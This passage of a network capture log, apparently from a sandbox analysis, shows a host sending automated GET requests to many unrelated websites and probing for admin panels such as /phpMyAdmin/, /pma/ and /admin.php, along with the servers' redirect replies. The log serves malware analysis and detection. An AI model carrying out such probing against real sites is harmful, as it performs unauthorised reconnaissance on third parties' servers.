Feb 21, 2024 00:26:22.094628096 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:22 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/
Feb 21, 2024 00:26:22.301739931 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:22 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/

Session ID	Source IP	Source Port	Destination IP	Destination Port
506	192.168.2.6	58226	86.105.245.69	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:22.215898991 CET	177	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:22.389072895 CET	392	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:22 GMT Content-Type: text/html Content-Length: 175 Connection: keep-alive Location: https://stylesense.co.uk/PhpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
507	192.168.2.6	58346	104.21.66.152	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:22.278681040 CET	171	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: att.com.tw Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
508	192.168.2.6	58360	104.21.66.152	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:22.317271948 CET	171	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: att.com.tw Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
509	192.168.2.6	58506	193.70.18.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:22.514503956 CET	161	OUT	GET / HTTP/1.1 Host: imp.ovh.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:22.674593925 CET	92	IN	HTTP/1.1 301 Moved Permanently content-length: 0 location: https://www.ovh.co.uk/mail/

Session ID	Source IP	Source Port	Destination IP	Destination Port
510	192.168.2.6	58580	75.2.70.75	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:22.620568037 CET	166	OUT	GET /admin HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:22.718106985 CET	344	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:22 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
511	192.168.2.6	58904	185.230.63.186	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:22.786119938 CET	176	OUT	GET /admin/ HTTP/1.1 Host: montessorihawaii.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:22.916182995 CET	839	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:22 GMT Content-Length: 0 Connection: keep-alive location: https://www.montessorihawaii.org/admin strict-transport-security: max-age=3600 x-wix-request-id: 1708471582.8251474477558114533 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLmUP/ddjOIocgASMjPBcXg4O5u3dMxPR3QRc6kpLZVuH,2d58ifebGbosy5xc+FRalruOh6R4fwSOvfRqE4Jtc0G/PI5CBbZQ47RDP8Nfv6i1qGeDh7NUxhdJePogTwBJgg==,2UNV7KOq4oGjA5+PKsX47PIHZG7rU4AwWR8fGXl1XwJYgeUJqUXtid+86vZww+nL,oeCSbq11YyM2LrWdre0MiAPBzEMPrQyi9uZsFRcWByA=,GCZRqREx605Y6yDgjOvSr0gzVvd88M9o49AqjE+T7lA=,/j+AjfLiOiE0Vc9NsP8sK9OGBA8EjSrrb+o8MGqPfV+fyFdu1BpPpgIayAnxFT6M+El08WdAlazUFNCK4dJeYQ== Cache-Control: no-cache X-Content-Type-Options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port
512	192.168.2.6	58888	15.161.71.77	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:22.868899107 CET	172	OUT	GET /pma/ HTTP/1.1 Host: iisalessandrini.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:23.047714949 CET	661	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:22 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Location: https://iisalessandrini.edu.it/pma/ Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 69 73 61 6c 65 73 73 61 6e 64 72 69 6e 69 2e 65 64 75 2e 69 74 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://iisalessandrini.edu.it/pma/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
513	192.168.2.6	58961	51.159.190.167	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:22.908030033 CET	178	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:23.067315102 CET	367	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:22 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://cabinet-orsika.fr/PhpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
514	192.168.2.6	58953	86.105.245.69	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:22.911189079 CET	171	OUT	GET /admin HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:23.076334953 CET	386	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:22 GMT Content-Type: text/html Content-Length: 175 Connection: keep-alive Location: https://stylesense.co.uk/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
515	192.168.2.6	59212	104.21.54.169	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:23.134099007 CET	184	OUT	GET /phpmyadmin/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:23.231617928 CET	704	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:23 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 21 Feb 2024 00:26:23 GMT Location: https://fortressrealcapital.com/phpmyadmin/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nFE4ugYDtEkOOMLf3FejggyqcIyRdQnbg%2BK5%2BfISgR00UuYk%2Fs4dxjjRPVnXwEwpoDecqGXvkJoxiO%2F97NtvQG00%2BZsazb%2BWYCTc5qxnqoXk3%2BtsNblRCiLkZxuNctrOPZ8qM4oOn%2BwYZg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 858a83a2cab0c32d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
516	192.168.2.6	59189	81.169.145.86	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:23.275466919 CET	175	OUT	GET /admin.php HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:23.452074051 CET	455	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:23 GMT Server: Apache/2.4.58 (Unix) Location: https://ksv-schwimmen.de/admin.php Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 73 76 2d 73 63 68 77 69 6d 6d 65 6e 2e 64 65 2f 61 64 6d 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://ksv-schwimmen.de/admin.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
517	192.168.2.6	59204	217.160.0.208	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:23.275525093 CET	180	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: caspiantravel.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:23.453636885 CET	457	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=iso-8859-1 Content-Length: 220 Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:23 GMT Server: Apache Location: http://www.caspianseagulltravels.com Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 61 73 70 69 61 6e 73 65 61 67 75 6c 6c 74 72 61 76 65 6c 73 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.caspianseagulltravels.com">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
518	192.168.2.6	59466	3.33.139.32	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:23.392916918 CET	167	OUT	GET /pma/ HTTP/1.1 Host: protonmail.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:23.539663076 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:23 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/
Feb 21, 2024 00:26:23.744668007 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:23 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/

Session ID	Source IP	Source Port	Destination IP	Destination Port
519	192.168.2.6	59677	213.186.33.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:23.654061079 CET	171	OUT	GET /admin/ HTTP/1.1 Host: pharmacie-vp.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:23.814685106 CET	458	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 20 Feb 2024 23:26:23 GMT content-type: text/html content-length: 138 location: http://imp.ovh.net x-iplb-request-id: BF60E3DE:E91D_D5BA2105:0050_65D5351F_8656600:3720 x-iplb-instance: 52243 set-cookie: SERVERID77446=200177\|ZdU1I\|ZdU1I; path=/; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
520	192.168.2.6	59813	31.193.11.2	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:23.704710960 CET	179	OUT	GET / HTTP/1.1 Host: www.caspianseagulltravels.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:23.867588043 CET	449	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:23 GMT Server: Apache Location: https://www.caspianseagulltravels.com/ Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 73 70 69 61 6e 73 65 61 67 75 6c 6c 74 72 61 76 65 6c 73 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.caspianseagulltravels.com/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
521	192.168.2.6	59810	217.26.61.200	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:23.719700098 CET	164	OUT	GET /admin HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:23.906058073 CET	419	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:23 GMT Server: Apache Location: https://eskimo.ch/admin Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 73 6b 69 6d 6f 2e 63 68 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://eskimo.ch/admin">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
522	192.168.2.6	59622	223.29.45.22	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:23.796060085 CET	180	OUT	GET /admin.php HTTP/1.1 Host: shinko-kensetsu.co.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:24.066490889 CET	459	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:24 GMT Server: Apache Location: http://www.shinko-kensetsu.eei.jp/admin.php Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 61 64 6d 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.shinko-kensetsu.eei.jp/admin.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
523	192.168.2.6	60432	193.70.18.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:24.128504038 CET	161	OUT	GET / HTTP/1.1 Host: imp.ovh.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:24.289753914 CET	92	IN	HTTP/1.1 301 Moved Permanently content-length: 0 location: https://www.ovh.co.uk/mail/

Session ID	Source IP	Source Port	Destination IP	Destination Port
524	192.168.2.6	60669	75.2.70.75	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:24.203984976 CET	167	OUT	GET /admin/ HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
